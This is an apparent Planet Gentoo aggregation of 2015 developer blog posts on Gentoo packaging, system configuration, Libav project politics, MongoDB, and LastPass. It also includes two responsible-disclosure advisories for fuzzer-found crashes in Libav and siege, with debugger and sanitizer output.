Linux localhost 3.10.65+ #1 SMP PREEMPT Fri Jul 10 20:28:28 CST 2015 armv7l GNU/Linux
shell@Y100pro:/ $ cat /proc/cpuinfo                                        
Processor : ARMv7 Processor rev 4 (v7l)
processor : 0
BogoMIPS : 32.39
Features : swp half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xd03
CPU revision : 4

Hardware : MT6735P
Revision : 0000
Serial : 0000000000000000


Although the rear camera appears not to have a true 13 MP sensor (the YouTube reviewers above think it is more like 8 MP), it still manages quite acceptable picture quality.

Comparing day and night shots

HDR off / HDR on


As you would expect, the MT6735P does not particularly shine in benchmarks. The UI, however, feels snappy and smooth, and web browsing is fine even on complex websites.

Interim conclusion

Despite the exaggerated (you could also say, dishonest) advertisement, I am satisfied with the Doogee Y100 Pro. You can't really expect more for the price.

What next?

Next I will try to get a Gentoo Prefix up on the device. I will post an update then.

Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this on Twitter and found it a very interesting read.

Hacking Team: a zero-day market case study

July 23, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Tasty calamares in Gentoo (July 23, 2015, 20:36 UTC)

First of all, it’s nothing to eat. So what is it then? Here is the introduction by upstream:

Calamares is an installer framework. By design it is very customizable, in order to satisfy a wide variety of needs and use cases. Calamares aims to be easy, usable, beautiful, pragmatic, inclusive and distribution-agnostic. Calamares includes an advanced partitioning feature, with support for both manual and automated partitioning operations. It is the first installer with an automated “Replace Partition” option, which makes it easy to reuse a partition over and over for distribution testing. Got a Linux distribution but no system installer? Grab Calamares, mix and match any number of Calamares modules (or write your own in Python or C++), throw together some branding, package it up and you are ready to ship!

I have just added the newest release version (1.1.2) to the tree, and a live version (9999) to my dev overlay. The underlying technology stack is mainly Qt5, KDE Frameworks, Python3, YAML and systemd. It is being picked up, and of course evaluated, by several Linux distributions.

You may be asking why I added it to Gentoo, where we have OpenRC as the default init system. You are right: at the moment it is not very useful for Gentoo. But for example Sabayon, as a downstream of ours, will (maybe) use it for its next releases, so in the first place it is just a service for our downstreams.

The second reason: there is a discussion on the gentoo-dev mailing list at the moment about rebooting the Gentoo installer. Instead of creating yet another installer implementation, we have two potential ways to pick it up, which are not mutually exclusive:

1. Write modules to make it work with sysvinit aka OpenRC
2. Solve Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

Have fun!

[2] johu dev overlay
[3] gentoo-dev ml – Rebooting the Installer Project
[4] Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

July 22, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)


These are the slides of my EuroPython 2015 talk.

The source code and ansible playbooks are available on github !

July 20, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Since updating to VMware Workstation 11 (from the Gentoo vmware overlay), I've experienced a lot of hangs of my KDE environment whenever a virtual machine was running. Basically my system became unusable, which is bad if your workflow depends on accessing both Linux and (gasp!) Windows 7 (as guest). I first suspected a dbus timeout (doing the "stopwatch test" for 25s waits), but it seems according to some reports that this might be caused by buggy behavior in kwin (4.11.21). Sadly I haven't been able to pinpoint a specific bug report.

Now, I'm not sure if the problem is really 100% fixed, but at least now the lags are much smaller. Here's how to do it (kudos to matthewls and vrenn):

  • Add to /etc/xorg.conf in the Device section
    Option "TripleBuffer" "True"
  • Create a file in /etc/profile.d with content
    (yes that starts with a double underscore).
  • Log out, stop your display manager, restart it.
I'll leave it as an exercise to the reader to figure out what these settings do. (Feel free to explain it in a comment. :) No guarantees of any kind. If this kills kittens you have been warned. Cheers.

July 18, 2015
Richard Freeman a.k.a. rich0 (homepage, bugs)
Running cron jobs as units automatically (July 18, 2015, 16:00 UTC)

I just added sys-process/systemd-cron to the Gentoo repository.  Until now I’ve been running it from my overlay and getting it into the tree was overdue.  I’ve found it to be an incredibly useful tool.

All it does is install a set of unit files and a crontab generator.  The unit files (best used by starting/enabling them) will run jobs from /etc/cron.* at the appropriate times.  The generator can parse /etc/crontab and create timer units for every line dynamically.

Note that the default Gentoo install runs the /etc/cron.* jobs from /etc/crontab, so if you aren't careful you might end up running them twice.  The simplest solutions to this are to either remove those lines from /etc/crontab, or install systemd-cron with USE=etc-crontab-systemd, which will have the generator ignore /etc/crontab and instead look for /etc/crontab-systemd, where you can install jobs you'd like to run using systemd.
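For example, with USE=etc-crontab-systemd set, a line in ordinary crontab syntax like the following (the backup script path is just a placeholder) gets a timer/service unit pair generated for it:

```
# /etc/crontab-systemd - standard crontab syntax, read by the systemd-cron generator
# min hour dom mon dow user command
  30  3    *   *   *   root /usr/local/bin/nightly-backup.sh
```

systemctl list-timers should then show the generated timer alongside the static cron.* ones.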

The generator works like you’d expect it to – if you edit the crontab file the units will automatically be created/destroyed dynamically.

One warning about timer units compared to cron jobs is that the jobs are run as services, which means that when the main process dies all its children will be killed.  If you have anything in /etc/cron.* which forks you’ll need to have the main script wait at the end.
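A minimal sketch of that pattern (the backgrounded job and result file here are stand-ins for whatever your script actually forks):

```shell
#!/bin/sh
# Hypothetical stand-in for an /etc/cron.daily script whose helper forks
# into the background (the sleep and result file are illustrative only).
( sleep 1; echo done > forked-job.result ) &

# Without this wait, the unit's main process would exit immediately and
# systemd would kill the still-running background child.
wait
echo "all children finished"
```

The `wait` at the end is what keeps the service's main process alive until every child has finished.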

On the topic of race conditions, each cron.* directory and each /etc/crontab line will create a separate unit.  Those units will all run in parallel (to the extent that one is still running when the next starts), but within a cron.* directory the scripts will run in series.  That may be a bit different from some cron implementations which may limit the number of simultaneous jobs globally.

All the usual timer unit logic applies.  stdout goes to the journal, systemctl list-timers shows what is scheduled, etc.

Filed under: gentoo, linux, systemd

July 17, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
OpenLDAP upgrade trap (July 17, 2015, 03:29 UTC)

After spending a few hours trying to figure out why OpenLDAP 2.4 did not want to return any results while 2.3 worked so nicely ...

The following addition to the slapd config file Makes Things Work (tm) - I have no idea if this is actually correct, but now things don't fail.

access to dn.base="dc=example,dc=com"
    by anonymous search
    by * none
I didn't notice this change in search behaviour in any of the Changelog, Upgrade docs or other documentation - so this is quite 'funny', but not really nice.

July 16, 2015

Libav is an open source set of tools for audio and video processing.

After talking with Luca Barbato, who is both a Gentoo and a Libav developer, I spent a bit of my time fuzzing libav; in particular I fuzzed libavcodec through avplay.
I hit a crash, and after I reported it to upstream, they confirmed the issue as a divide-by-zero.

The complete gdb output:

ago@willoughby $ gdb --args /usr/bin/avplay avplay.crash 
GNU gdb (Gentoo 7.7.1 p1) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
Find the GDB manual and other documentation resources online at:
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/avplay...Reading symbols from /usr/lib64/debug//usr/bin/avplay.debug...done.
(gdb) run
Starting program: /usr/bin/avplay avplay.crash
warning: Could not load shared library symbols for
Do you need "set solib-search-path" or "set sysroot"?
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/".
avplay version 11.3, Copyright (c) 2003-2014 the Libav developers
  built on Jun 19 2015 09:50:59 with gcc 4.8.4 (Gentoo 4.8.4 p1.6, pie-0.6.1)
[New Thread 0x7fffec4c7700 (LWP 7016)]
[New Thread 0x7fffeb166700 (LWP 7017)]
INFO: AddressSanitizer ignores mlock/mlockall/munlock/munlockall
[New Thread 0x7fffe9e28700 (LWP 7018)]
[h263 @ 0x60480000f680] Format detected only with low score of 25, misdetection possible!
[h263 @ 0x60440001f980] Syntax-based Arithmetic Coding (SAC) not supported
[h263 @ 0x60440001f980] Reference Picture Selection not supported
[h263 @ 0x60440001f980] Independent Segment Decoding not supported
[h263 @ 0x60440001f980] header damaged

Program received signal SIGFPE, Arithmetic exception.
[Switching to Thread 0x7fffe9e28700 (LWP 7018)]
0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
142     /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c: No such file or directory.
(gdb) bt
#0  0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
#1  0x00007ffff21f3c2d in ff_h263_decode_picture_header (s=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:1112
#2  0x00007ffff1ae16ed in ff_h263_decode_frame (avctx=0x60440001f980, data=0x60380002f480, got_frame=0x7fffe9e272f0, avpkt=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/h263dec.c:444
#3  0x00007ffff2cd963e in avcodec_decode_video2 (avctx=0x60440001f980, picture=0x60380002f480, got_picture_ptr=got_picture_ptr@entry=0x7fffe9e272f0, avpkt=avpkt@entry=0x7fffe9e273b0) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/utils.c:1600
#4  0x00007ffff44d4fb4 in try_decode_frame (st=st@entry=0x60340002fb00, avpkt=avpkt@entry=0x601c00037b00, options=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:1910
#5  0x00007ffff44ebd89 in avformat_find_stream_info (ic=0x60480000f680, options=0x600a00009e80) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:2276
#6  0x0000000000431834 in decode_thread (arg=0x7ffff7e0b800) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/avplay.c:2268
#7  0x00007ffff0284b08 in ?? () from /usr/lib64/
#8  0x00007ffff02b4be9 in ?? () from /usr/lib64/
#9  0x00007ffff4e65aa8 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.4/
#10 0x00007ffff0062204 in start_thread () from /lib64/
#11 0x00007fffefda957d in clone () from /lib64/

Affected version:
11.3 (and maybe past versions)

Fixed version:
11.5 and 12.0

Commit fix:;a=commitdiff;h=0a49a62f998747cfa564d98d36a459fe70d3299b;hp=6f4cd33efb5a9ec75db1677d5f7846c60337129f

This bug was discovered by Agostino Sarubbo of Gentoo.


2015-06-21: bug discovered
2015-06-22: bug reported privately to upstream
2015-06-30: upstream committed the fix
2015-07-14: CVE assigned
2015-07-16: advisory release

This bug was found with American Fuzzy Lop.
This bug does not affect ffmpeg.


July 14, 2015
siege: off-by-one in load_conf() (July 14, 2015, 19:04 UTC)

Siege is an http load testing and benchmarking utility.

During the test of a webserver, I hit a segmentation fault. I recompiled siege with ASan, and it clearly showed an off-by-one in load_conf(). The issue is reproducible without passing any arguments to the binary.
The complete output:

ago@willoughby ~ # siege
==488==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000d7f1 at pc 0x00000051ab64 bp 0x7ffcc3d19a70 sp 0x7ffcc3d19a68
READ of size 1 at 0x60200000d7f1 thread T0
#0 0x51ab63 in load_conf /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263:12
#1 0x515486 in init_config /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:96:7
#2 0x5217b9 in main /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/main.c:324:7
#3 0x7fb2b1b93aa4 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/csu/libc-start.c:289
#4 0x439426 in _start (/usr/bin/siege+0x439426)

0x60200000d7f1 is located 0 bytes to the right of 1-byte region [0x60200000d7f0,0x60200000d7f1)
allocated by thread T0 here:
#0 0x4c03e2 in __interceptor_malloc /var/tmp/portage/sys-devel/llvm-3.6.1/work/llvm-3.6.1.src/projects/compiler-rt/lib/asan/
#1 0x7fb2b1bf31e9 in __strdup /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/string/strdup.c:42

SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263 load_conf
Shadow bytes around the buggy address:
0x0c047fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[01]fa
0x0c047fff9b00: fa fa 03 fa fa fa fd fd fa fa fd fa fa fa fd fd
0x0c047fff9b10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fff9b20: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9b30: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9b40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb

Affected version:
3.1.0 (and maybe past versions).

Fixed version:
Not available.

Commit fix:
Not available.

This bug was discovered by Agostino Sarubbo of Gentoo.

Not really qualifiable as a security issue; it is more of a programming bug.

2015-06-09: bug discovered
2015-06-10: bug reported privately to upstream
2015-07-13: no upstream response
2015-07-14: advisory release


July 10, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Plasma 5 and kdbus testing (July 10, 2015, 22:03 UTC)

Thanks to Mike Pagano, who enabled kdbus support in Gentoo kernel sources almost 2 weeks ago, we now have the choice to test it. As described in Mike's blog post, you will need to enable the USE flags kdbus and experimental on sys-kernel/gentoo-sources and kdbus on sys-apps/systemd.

root # echo "sys-kernel/gentoo-sources kdbus experimental" >> /etc/portage/package.use/kdbus

If you are running >=sys-apps/systemd-221, kdbus is already enabled by default; otherwise you have to enable it:

root # echo "sys-apps/systemd kdbus" >> /etc/portage/package.use/kdbus

Any packages affected by the change need to be rebuilt.

root # emerge -avuND @world

Enable the kdbus option in the kernel:

General setup --->
<*> kdbus interprocess communication

Build the kernel, install it and reboot. Now we can check if kdbus is enabled properly. systemd should automatically mask dbus.service and start systemd-bus-proxyd.service instead (Thanks to eliasp for the info).

root # systemctl status dbus
● dbus.service
Loaded: masked (/dev/null)
Active: inactive (dead)

root # systemctl status systemd-bus-proxyd
● systemd-bus-proxyd.service - Legacy D-Bus Protocol Compatibility Daemon
Loaded: loaded (/usr/lib64/systemd/system/systemd-bus-proxyd.service; static; vendor preset: enabled)
Active: active (running) since Fr 2015-07-10 22:42:16 CEST; 16min ago
Main PID: 317 (systemd-bus-pro)
CGroup: /system.slice/systemd-bus-proxyd.service
└─317 /usr/lib/systemd/systemd-bus-proxyd --address=kernel:path=/sys/fs/kdbus/0-system/bus

Plasma 5 starts fine here using sddm as login manager. On Plasma 4 you may be interested in Bug #553460.

Looking forward to when Plasma 5 gets user session support.

Have fun!

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)


My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

For quite some time, I have tried to get links in Thunderbird to open automatically in Chrome or Chromium instead of defaulting to Firefox. Moreover, I have Chromium start in incognito mode by default, and I would like those links to do the same. This has been a problem for me since I don’t use a full desktop environment like KDE, GNOME, or even XFCE. As I’m really a minimalist, I only have my window manager (which is Openbox), and the applications that I use on a regular basis.

One thing I found, though, is that by using PCManFM as my file manager, I do have a few other related applications and utilities that help me customise my workspace and workflows. One such application is libfm-pref-apps, which allows for setting preferred applications. I found that I could do just what I wanted to do without mucking around with manually setting MIME types, writing custom hooks for Thunderbird, or any of that other mess.

Here’s how it was done:

  1. Execute /usr/bin/libfm-pref-apps from your terminal emulator of choice
  2. Under “Web Browser,” select “Customise” from the drop-down menu
  3. Select the “Custom Command Line” tab
  4. In the “Command line to execute” box, type /usr/bin/chromium --incognito --start-maximized %U
  5. In the “Application name” box, type “Chromium incognito” (or however else you would like to identify the application)

Voilà! After restarting Thunderbird, my links opened just like I wanted them to. The only modification that you might need to make is the “Command line to execute” portion. If you use the binary of Chrome instead of building the open-source Chromium browser, you would need to change it to the appropriate executable (and the path may be different for you, depending on your system and distribution). Also, in the command line that I have above, here are some notes about the switches used:

  • --incognito starts Chromium in incognito mode by default (that one should be obvious)
  • --start-maximized makes the browser window open at the full size of your screen
  • %U allows Chromium to accept a URL or list of URLs, and thus opens the link that you clicked in Thunderbird

Under the hood, it seems like libfm-pref-apps is adding some associations in the ~/.config/mimeapps.list file. The relevant lines that I found were:

[Added Associations]
x-scheme-handler/http=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;
x-scheme-handler/https=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;

Hope this information helps you get your links to open in your browser of choice (and with the command-line arguments that you want)!


July 09, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
My fun starts now (July 09, 2015, 08:35 UTC)

Debian decided to move to the new FFmpeg, what does it mean to me? Why should I care? This post won’t be technical for once, if you think “Libav is evil” start reading from here.

Relationship between Libav and Debian

What was FFmpeg split into two projects: Michael Niedermayer kept the name, due to his ties with the legal owner of the trademark, while the group of 18 other people "merged" everything they were doing under the new Libav name.

For Gentoo I, maybe naively, decided to just have both and let whoever wanted to maintain the other package. Gentoo is about choice, and whoever wants to shoot himself in the foot has to be free to do that in the safest possible way.

For Debian, being binary packaged, whoever was maintaining the package decided to stay with Libav. That wasn't surprising, given that the "lack of releases" was one of the sore points of the former FFmpeg, and he had started to get involved with upstream to try to fix it.

Perceived Leverage and Real Shackles

Libav started with the idea to fix everything that went wrong with the Former FFmpeg:
– Consensus instead of idolatry for THE Leader
– Paced releases instead of cvs is always a release
– Maintained releases branches for years
– git instead of svn
– Cleaner code instead of quick hacks to solve the problem of the second
– Helping downstreams instead of giving them the finger.

Being in Debian, according to some people, was undeserved because "Libav is evil", and since we wrongly thought that people would look at actions rather than at random blog posts by people with more bias than anything else, we just kept writing code. That was a huge mistake; this blog post and the previous one are my attempt to address it.

Being in Debian, to me, meant that I had to help fix stale versions of software, often even without an upstream.

The people at Debian, instead of helping (the number of patches coming from them over the years amounts to 1, according to git), kept piling up work on us.

Fun requests such as "do remove a standard test image, because according to them its origin is unclear" or "do maintain the ancient release branch that is 3 major releases behind" have been quite common.

For me, Debian has been no help and an additional burden.

The leverage that being in a distribution theoretically gives, according to those crying that the evil Libav was in Debian, amounts to none for me: their users complain because the version provided is stale; their developers do not help even with keeping the point releases up to date, or with updating the software that uses Libav, because they are scared of being tainted; downstreams such as Kubi (who are so naive as to praise FFmpeg for what actually happened in Libav, such as the HEVC multi-thread support Anton wrote) keep picking the implementation they prefer and use ffmpeg-only APIs whenever they can (Debian will ask us to fix that for them anyway).

Is being in Debian important?

Last time they were discussing moving to FFmpeg, I had the unpleasant experience of reading lots of lovely emails with passive-aggressive snide remarks such as "libav has just developers, not users", and of seeing the fruits of the smear campaign, such as "is it true you stole the FFmpeg hardware?", on their mailing list (by the way, during the past VDD the FFmpeg people there said at least that this would be addressed; well, it has not been yet, thank you).

At that time I was asked to present Libav; this time, after reading in the Debian wiki the "case" presented with skewed git statistics (maybe purge the merge commits when you count them to compare project activity?) and other number-dressing, I just got sick of it.

Personally, I do not care. There are better ways to spend your free time than doing the distro maintenance work for people that do not even thank you (because you are evil).

The smear campaign pays

I'm sure that now that the new FFmpeg gets to replace Libav, it will receive more contributions from people, and maybe those who were crying about the "oh so unjust" treatment will be happy to do the maintenance churn.

Anyway, that's not my problem anymore, and I guess I can spend more time writing about the "social issues" around the project, trying to defuse at least a little the so-effective "Libav is evil" narrative, one post at a time.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In our previous attempt to upgrade our production cluster to 3.0, we had to roll back from the WiredTiger engine on primary servers.

Since then, we switched back our whole cluster to 3.0 MMAPv1 which has brought us some better performances than 2.6 with no instability.

Production checklist

We decided to use this increase in performance to allow us some time to fulfil the entire production checklist from MongoDB, especially the migration to XFS. We’re slowly upgrading our servers kernels and resynchronising our data set after migrating from ext4 to XFS.

Ironically, the strong recommendation of XFS in the production checklist appeared 3 days after our failed attempt at WiredTiger… This is frustrating but gives some kind of hope.

I’ll keep on posting on our next steps and results.

Our hero WiredTiger Replica Set

While we were battling with our production cluster, we got a spontaneous major increase in the daily volumes from another platform which was running on a single Replica Set. This application is write intensive and very disk I/O bound. We were killing the disk I/O with almost a continuous 100% usage on the disk write queue.

Despite our frustration with WiredTiger so far, we decided to give it a chance, considering that this time we were talking about a single Replica Set. We were very happy to see WiredTiger live up to its promises with an almost shocking serenity.

Disk I/O went down dramatically, almost as if nothing was happening any more. Compression did magic on our disk usage and our application went Roarrr !

July 06, 2015
Zack Medico a.k.a. zmedico (homepage, bugs)

I’ve created a utility called tardelta (ebuild available) that people using containers may be interested in. Here’s the README:

It is possible to optimize docker containers such that multiple containers are based off of a single copy of a common base image. If containers are constructed from tarballs, then it can be useful to create a delta tarball which contains the differences between a base image and a derived image. The delta tarball can then be layered on top of the base image using a Dockerfile like the following:

FROM base
ADD delta.tar.xz /

Many different types of containers can thus be derived from a common base image, while sharing a single copy of the base image. This saves disk space, and can also reduce memory consumption since it avoids having duplicate copies of base image data in the kernel’s buffer cache.
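tardelta works directly on tarballs and handles the corner cases, but the core idea can be sketched with plain POSIX tools; the directory names and sample files below are purely illustrative:

```shell
#!/bin/sh
# Sketch: pack only the files that are new or changed in derived/ relative
# to base/ into delta.tar.xz. The sample trees stand in for real image roots.
mkdir -p base derived delta
echo shared  > base/common.txt
echo shared  > derived/common.txt   # identical in both: must NOT enter the delta
echo changed > derived/app.conf     # only in derived: must enter the delta

cd derived
find . -type f | while read -r f; do
    # copy into delta/ only when the file is missing from base/ or differs
    if ! cmp -s "$f" "../base/$f" 2>/dev/null; then
        mkdir -p "../delta/$(dirname "$f")"
        cp "$f" "../delta/$f"
    fi
done
cd ..
tar -cJf delta.tar.xz -C delta .
```

The resulting delta.tar.xz contains only app.conf and can be layered on the base image with the Dockerfile shown above.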

July 03, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Summer Sprint in Stockholm (July 03, 2015, 19:44 UTC)

Last weekend some libav developers met in the South Pole offices with additional sponsorship from Inteno Broadband Technology. (And the people at Borgodoro that gave us more chocolate to share with everybody).


Since last year, the libav project has held sprints to meet up, discuss in person topics that require a more direct medium than IRC or mailing lists, and usually write some code while asking for direct opinions and help.

Who attended

Benjamin was our host for the event. Andreas joined us for the first day only, while Anton, Vittorio, Kostya, Janne, Jan and Rémi stayed both days.

What we did

The focus was split across a number of areas of interest:

  • API: some interesting discussion between Rémi and Anton on how to clarify a tricky detail regarding AVCodecContext and AVFrame, and which one to trust when.
  • Reverse Engineering: With Vittorio and Kostya having fun unraveling codecs one after the other (I think they got 3 working)
  • Release 12 API and ABI break
    • What to remove and what to keep further
    • What to change so it is simpler to use
    • If there is enough time to add the decoupled API for avcodec
  • Release 12 wishlist:
    • HEVC speed improvements, since even the C code can be sped up.
    • HEVC extended range support, since there is YUV 422 content out now.
    • More optimizations for the newer architectures (aarch64 and power64le)
    • More hardware accelerator support (e.g. HEVC encoding and decoding support for Intel MediaSDK).
    • Some more filters, since enough people asked for them.
    • Merge some of the pending work (e.g. go2meeting3, the new asf demuxer).
    • Get more security fixes in (with ago kindly helping me on this).
    • … and more …
  • New website with markdown support, to make it easier for people to update.

During the sprint we managed to write a lot of code, and even to push some of it.
Maybe a little too early in the case of asf, but it is better to have it in and fix it before the release.

Special mention to Jan for getting a quite exotic container almost ready; I'm looking forward to seeing it on the ml. And to Andreas, for reminding me that AVScale is sorely needed, by sending me a patch that fixes a problem his PowerPC users are experiencing while uncovering some strange problem in swscale… I'll need to figure out a good way to get a big-endian PowerPC running to look at it in detail.

Thank you

I want to especially thank all the people at South Pole who welcomed me when I arrived a day early, and everyone who participated and made the event possible. It was fun!

Post Scriptum

  • This post was delayed a week since I had been horribly busy, sorry for the delay =)
  • During the sprint, legends such as kropping the sourdough monster and the burning teapot were created; some references to them will probably appear in commits and code.
  • Anybody with experience with qemu-user for PowerPC is welcome to share their knowledge with me.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
KDEPIM without Akonadi (July 03, 2015, 14:16 UTC)

As you know, Gentoo is all about flexibility. You can run bleeding edge code (portage, our package manager, even lets you install KF5 and friends straight from git master) or you can focus on stability and trusted code. This is why, for the last several years, we've been offering our users KDEPIM 4.4 (the version where KMail e-mail storage was not yet integrated with Akonadi, also known as KMail1) as a drop-in replacement for the newer versions.
Recently the Nepomuk search framework has been replaced by Baloo, and after some discussion we decided that it's now time for the Nepomuk-related packages to go. The problem is, the old KDEPIM packages still depend on them via their Akonadi version. This is why - for those of our users who prefer to run KDEPIM 4.4 / KMail1 - we've decided to switch to Pali Rohár's kdepim-noakonadi fork (see also his 2013 blog post and the code). The packages are right now in the KDE overlay, but will move to the main tree after a few days of testing and be treated as an update of KDEPIM.
The fork is essentially KDEPIM 4.4 including some additional bugfixes from the KDE/4.4 git branch, with KAddressbook patched back to its KDEPIM 4.3 state and references to Akonadi removed elsewhere. This is in some ways a functionality regression, since the integration of e.g. different calendar types is lost; however, in that version it never really worked perfectly anyway.

For now, you will still need the akonadi-server package, since kdepimlibs (outside kdepim and now at version 4.14.9) requires it to build, but you'll never need to start the Akonadi server. As a consequence, Nepomuk support can be disabled everywhere, and the Nepomuk core and client and Akonadi client packages can be removed by the package manager (--depclean; make sure to first globally disable the nepomuk USE flag and rebuild accordingly).
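As a sketch, after globally disabling the flag (e.g. adding -nepomuk to USE in /etc/portage/make.conf), the rebuild and cleanup described above boil down to:

root # emerge -avuND @world
root # emerge --ask --depclean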

You might ask "Why are you still doing this?"... well. I've been told Akonadi and Baloo are working very nicely, and again I've considered upgrading all my installations... but then, on my work desktop where I am using the newest and greatest KDE4PIM, bug 338658 pops up regularly and stops syncing of important folders. I just don't have the time to pointlessly dig deep into the Akonadi database every few days. So KMail1 it is, and I'll rather spend some time occasionally picking and backporting bugfixes.

June 28, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
broken-endian (June 28, 2015, 20:44 UTC)

You wrote your code, you wrote the tests and everything seems working.

Then somebody runs your code on a big-endian machine and reports that EVERYTHING is broken.

Usually most data is serialized to disk or wire as big-endian, while most CPUs do their computation in little-endian (with MIPS and PowerPC as rare exceptions). If you assume the relationship between the data on the wire and the data in the CPU registers is always the same, you are bound to have problems (and it gets even worse if you decide to write the data to disk as little-endian because swapping from CPU to disk feels slow; you are doing it wrong).


The problem mainly shows up while reading or writing:

  • Sometimes it feels simpler to copy over some packed structure using the equivalent of read(fd, &my_struct, sizeof(my_struct)). If the struct contains anything other than byte-sized variables it won’t work portably, so it is safe to say it won’t work at all. It gets even worse if you forget to mark the structure as packed.
  • Writing has the same issue: never try to directly write a structure or even 16-bit integers without making sure you get the expected endianness right.

Mini-post written to recall what not to do (more examples later).

June 27, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
LastPass got hacked, I'm still okay with it (June 27, 2015, 13:23 UTC)

So LastPass was compromised, as they themselves report. I'm sure there are plenty of smug geeks out there, happy about users being compromised. I thought this is the right time to remind people why I'm a LastPass user, and will stay one even after this.

The first part is a matter of trust in the technology. If I did not trust LastPass's design enough to believe they have no easy access to the decrypted content, I wouldn't be using it to begin with. And since I do not need to trust the LastPass operators, even if the encrypted vaults were compromised (and they say they weren't), I wouldn't worry too much.

On the other hand, I followed the obvious course of not only changing the master password, but also changing the important passwords, just to be paranoid. This is actually one good side of LastPass — changing the passwords that are really important is very easy as they instrument the browser, so Facebook, Twitter, Amazon, PayPal, … are one click away from a new, strong password.

Once again, the main reason why I suggest tools such as LastPass (and I like LastPass, but that's just preference) is that they are easy to use, and easy to use means people will use them. Making tools that are perfectly secure in theory but very hard to use just means people will not use them, full stop. A client-side certificate is much more secure than a password, but at the same time procuring one and using it properly is non-trivial so in my experience only a handful of services use that — I know of a couple of banks in Italy, and of course StartSSL and similar providers.

The problem with offline services is that, for the most part, they don't allow good access from phones, for instance. So you end up choosing memorable passwords for the things you use often from the phone. But memorable passwords are usually fairly easy to crack, unless you use known methods and long passwords — although at least it's not the case, like I read on Arse^H recently, that since we know the md5 hash for "mom", any password with that string anywhere is weakened.

Let's take an example away from the password vaults. In Ireland (and I assume the UK, simply because the local systems are essentially the same in many aspects), banks have this bollocks idea that it is more secure to ask for some of the characters of a password rather than the full password. I think this is a remnant of old bank teller protocols, as I remember reading about that in The Art of Deception (a good read, by the way).

While in theory picking a random part of the password means a phishing attempt would never get the full password, and thus won't be able to access the bank's website unless they are very lucky and get exactly the same three indexes over and over, it is a frustrating experience.

